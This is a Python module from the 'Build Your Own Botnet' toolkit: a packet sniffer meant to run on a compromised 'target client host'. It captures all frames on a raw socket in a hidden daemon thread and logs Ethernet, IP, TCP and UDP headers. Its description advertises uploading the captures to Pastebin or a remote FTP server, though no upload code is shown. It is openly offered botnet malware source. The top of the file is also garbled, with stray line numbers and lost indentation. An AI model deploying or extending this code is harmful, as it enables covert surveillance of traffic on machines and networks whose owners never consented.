GitHub Repository: malwaredllc/byob
Path: blob/master/web-gui/buildyourownbotnet/modules/packetsniffer.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
'Packet Sniffer (Build Your Own Botnet)'
# standard library
import time
import struct
import socket
import binascii
import threading
try:
from StringIO import StringIO # Python 2
except ImportError:
from io import StringIO # Python 3
# utilities
import util
# globals
packages = []
22
platforms = ['linux2','darwin']
23
results = {}
24
log = StringIO()
25
flag = threading.Event()
26
usage = 'packetsniffer [mode]'
27
desription = """
28
Capture packets on the target client host machine's local network
29
and optionally upload them to Pastebin or to a remote FTP server
30
"""
# main
def _udp_header(data):
    """Parse the 8-byte UDP header at the front of ``data`` and log it.

    Reads source port, destination port, length and checksum (network byte
    order) and appends one formatted block to the module-level ``log``
    buffer, which is looked up through ``globals()`` at call time.

    :param bytes data: packet bytes starting at the UDP header
    :return: the bytes after the header (``data[8:]``), or ``None`` when
        anything raised -- e.g. ``struct.error`` on fewer than 8 bytes -- in
        which case only an error line is logged. Callers must expect ``None``.
    """
    try:
        src_port, dst_port, length, checksum = struct.unpack('!4H', data[:8])
        fields = [
            ('Source', src_port),
            ('Dest', dst_port),
            ('Length', length),
            ('Check Sum', checksum),
        ]
        lines = [
            '\n================== UDP HEADER ==================',
            '\n================================================',
        ]
        lines.extend('\n{:>20} , {}\t\t\t'.format(label, value) for label, value in fields)
        lines.append('\n================================================')
        # One write instead of several: the buffer content is identical.
        globals()['log'].write(''.join(lines))
        return data[8:]
    except Exception as e:
        globals()['log'].write("\nError in {} header: '{}'".format('UDP', str(e)))
def _tcp_header(recv_data):
    """Parse a fixed 20-byte TCP header at the front of ``recv_data`` and log it.

    Unpacks ports, sequence/ack numbers, the low six flag bits
    (URG/ACK/PSH/RST/SYN/FIN), window, checksum and urgent pointer, and
    appends one formatted block to the module-level ``log`` buffer.

    Limitations visible in this code: exactly 20 bytes are consumed, so TCP
    options (data offset > 5) are returned as part of the payload rather than
    skipped, and the data offset itself is never written to the log.

    :param bytes recv_data: packet bytes starting at the TCP header
    :return: ``recv_data[20:]``, or ``None`` when anything raised (e.g. fewer
        than 20 bytes), in which case only an error line is logged.
    """
    # Order matters: it fixes the order of names in the "Flags" line.
    flag_bits = (
        ('URG', 0x0020),
        ('ACK', 0x0010),
        ('PSH', 0x0008),
        ('RST', 0x0004),
        ('SYN', 0x0002),
        ('FIN', 0x0001),
    )
    try:
        (src_port, dst_port, seq_num, ack_num,
         ofs_res_flags, window, checksum, urgent) = struct.unpack('!2H2I4H', recv_data[:20])
        flags = ofs_res_flags & 0x003f
        set_flags = ', '.join(name for name, mask in flag_bits if flags & mask)
        # (label, value, trailing tabs) -- the tab runs are part of the log format.
        rows = (
            ('Source', src_port, '\t\t\t'),
            ('Target', dst_port, '\t\t\t'),
            ('Seq Num', seq_num, '\t\t\t'),
            ('Ack Num', ack_num, '\t\t'),
            ('Flags', set_flags, '\t\t'),
            ('Window', window, '\t\t\t'),
            ('Check Sum', checksum, '\t\t\t'),
            ('Urg Pnt', urgent, '\t\t\t'),
        )
        out = globals()['log']
        out.write('\n================== TCP HEADER ==================')
        out.write('\n================================================')
        for label, value, tail in rows:
            out.write('\n{:>20} , {}'.format(label, value) + tail)
        out.write('\n================================================')
        return recv_data[20:]
    except Exception as e:
        globals()['log'].write("\nError in {} header: '{}'".format('TCP', str(e)))
def _ip_header(data):
    """Parse a fixed 20-byte IPv4 header at the front of ``data`` and log it.

    Unpacks version, IHL, TOS, total length, identification, flags, fragment
    offset, TTL, protocol number, checksum and dotted-quad source/destination
    addresses, and appends one formatted block to the module-level ``log``
    buffer.

    Limitations visible in this code: exactly 20 bytes are consumed whatever
    the IHL says, so IPv4 options (IHL > 5) stay at the front of the returned
    payload, and the version field is logged but never checked to be 4.

    :param bytes data: packet bytes starting at the IPv4 header
    :return: ``(data[20:], protocol)`` where ``protocol`` is the "next
        protocol" number (6 = TCP, 17 = UDP), or ``None`` when anything raised
        (e.g. fewer than 20 bytes), in which case only an error line is logged.
    """
    try:
        (ver_ihl_tos, total_len, ident, flags_frag,
         ttl_proto, checksum, src_raw, dst_raw) = struct.unpack('!6H4s4s', data[:20])
        protocol = ttl_proto & 0x00ff
        # (label, value, trailing tabs); inet_ntoa runs here, before any write,
        # so a bad address leaves the log untouched apart from the error line.
        rows = (
            ('VER', ver_ihl_tos >> 12, '\t\t\t'),
            ('IHL', (ver_ihl_tos >> 8) & 0x0f, '\t\t\t'),
            ('TOS', ver_ihl_tos & 0x00ff, '\t\t\t'),
            ('Length', total_len, '\t\t\t'),
            ('ID', ident, '\t\t\t'),
            ('Flags', flags_frag >> 13, '\t\t\t'),
            ('Frag Offset', flags_frag & 0x1fff, '\t\t\t'),
            ('TTL', ttl_proto >> 8, '\t\t\t'),
            ('Next Protocol', protocol, '\t\t\t'),
            ('Check Sum', checksum, '\t\t\t'),
            ('Source IP', socket.inet_ntoa(src_raw), '\t\t'),
            ('Dest IP', socket.inet_ntoa(dst_raw), '\t\t'),
        )
        out = globals()['log']
        out.write('\n================== IP HEADER ===================')
        out.write('\n================================================')
        for label, value, tail in rows:
            out.write('\n{:>20} , {}'.format(label, value) + tail)
        out.write('\n================================================')
        return data[20:], protocol
    except Exception as e:
        globals()['log'].write("\nError in {} header: '{}'".format('IP', str(e)))
def _eth_header(data):
    """Parse the 14-byte Ethernet II header at the front of ``data`` and log it.

    Logs destination and source MAC (six colon-separated hex pairs) and the
    high byte of the EtherType, then reports whether the rest of the frame
    should go to the IPv4 parser.

    Behaviour visible in this code, worth knowing before trusting the log:
      * ``binascii.hexlify`` returns ``bytes`` on Python 3, so each MAC pair
        is rendered by ``{}`` as ``b'xx'`` rather than ``xx``.
      * ``proto`` is ``EtherType >> 8`` and the IPv4 test is ``proto == 8``,
        which matches 0x0800 (IPv4) but equally any other 0x08xx EtherType
        (0x0806 ARP, for one), whose payload would then be handed to
        ``_ip_header``.

    :param bytes data: raw frame bytes starting at the destination MAC
    :return: ``(data[14:], is_ipv4)``, or ``None`` when anything raised (e.g.
        fewer than 14 bytes), in which case only an error line is logged.
    """
    def colon_mac(hexmac):
        # hexmac is the 12-character hexlify() output; each pair goes through
        # ``{}`` individually so the rendering matches the original exactly.
        return '{}:{}:{}:{}:{}:{}'.format(*[hexmac[i:i + 2] for i in range(0, 12, 2)])

    try:
        dst_raw, src_raw, ethertype = struct.unpack('!6s6sH', data[:14])
        proto = ethertype >> 8
        out = globals()['log']
        out.write('\n================================================')
        out.write('\n================== ETH HEADER ==================')
        out.write('\n================================================')
        out.write('\n{:>20} , {}\t'.format('Target MAC', colon_mac(binascii.hexlify(dst_raw))))
        out.write('\n{:>20} , {}\t'.format('Source MAC', colon_mac(binascii.hexlify(src_raw))))
        out.write('\n{:>20} , {}\t\t\t'.format('Protocol', proto))
        out.write('\n================================================')
        return data[14:], proto == 8
    except Exception as e:
        globals()['log'].write("\nError in {} header: '{}'".format('ETH', str(e)))
def _run():
    """Worker loop: read raw Ethernet frames on the host and log their headers.

    Opens a ``PF_PACKET``/``SOCK_RAW`` socket for every EtherType
    (``socket.htons(0x0003)`` is ETH_P_ALL) and loops forever, reading up to
    2048 bytes per frame and passing it through the Ethernet -> IPv4 ->
    TCP/UDP parsers, each of which appends to the module-level ``log`` buffer.

    Facts grounded in this file:
      * ``socket.PF_PACKET`` exists only on Linux, so this raises
        ``AttributeError`` elsewhere; opening a raw socket also requires
        CAP_NET_RAW (typically root), otherwise ``socket.socket`` raises.
      * The loop has no exit path. The module-level ``flag`` Event is declared
        ``global`` but never waited on (that gate, and the per-frame exception
        handling, were commented out in the original), so the ``close()``
        after the loop is unreachable, and a parser returning ``None`` -- its
        error path -- ends this thread with a ``TypeError`` on unpacking.
    """
    global flag  # kept from the original; not read or set in this function
    raw_sock = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.htons(0x0003))
    while True:
        frame = raw_sock.recv(2048)
        payload, is_ipv4 = _eth_header(frame)
        if not is_ipv4:
            continue
        payload, ip_proto = _ip_header(payload)
        if ip_proto == 6:
            payload = _tcp_header(payload)
        elif ip_proto == 17:
            payload = _udp_header(payload)
    # Not reachable: the loop above never breaks. Kept to mirror the original.
    try:
        raw_sock.close()
    except:
        pass
def run():
    """Start the sniffer worker in a background thread and return the thread.

    ``_run`` is started as a daemon thread so it does not keep the interpreter
    alive; the thread's ``name`` is the launch timestamp from ``time.time()``,
    passed through as-is.

    Note: the original docstring advertised an optional ``seconds`` duration,
    but no such parameter exists and ``_run`` never stops on its own.

    :return: the started ``threading.Thread``
    """
    worker = threading.Thread(target=_run, name=time.time())
    worker.daemon = True
    worker.start()
    return worker